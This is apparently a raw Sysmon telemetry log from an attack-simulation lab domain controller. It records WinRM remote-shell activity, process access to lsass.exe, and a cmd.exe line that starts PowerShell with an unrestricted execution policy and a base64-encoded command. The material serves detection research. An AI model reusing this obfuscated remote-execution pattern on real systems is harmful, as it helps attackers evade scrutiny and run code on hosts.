13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8E22-6005-DA02-00000000A201}44601432C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.223{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E22-6005-CF16-110000000000}0x1116cf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.216{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.153{59A5CD1D-8CA9-6005-1300-00000000A201}12682032C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.153{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.138{59A5CD1D-8E22-6005-DB02-00000000A201}24481708C:\Windows\system32\conhost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DB02-00000000A201}2448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.128{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E22-6005-CF16-110000000000}0x1116cf0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:22.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 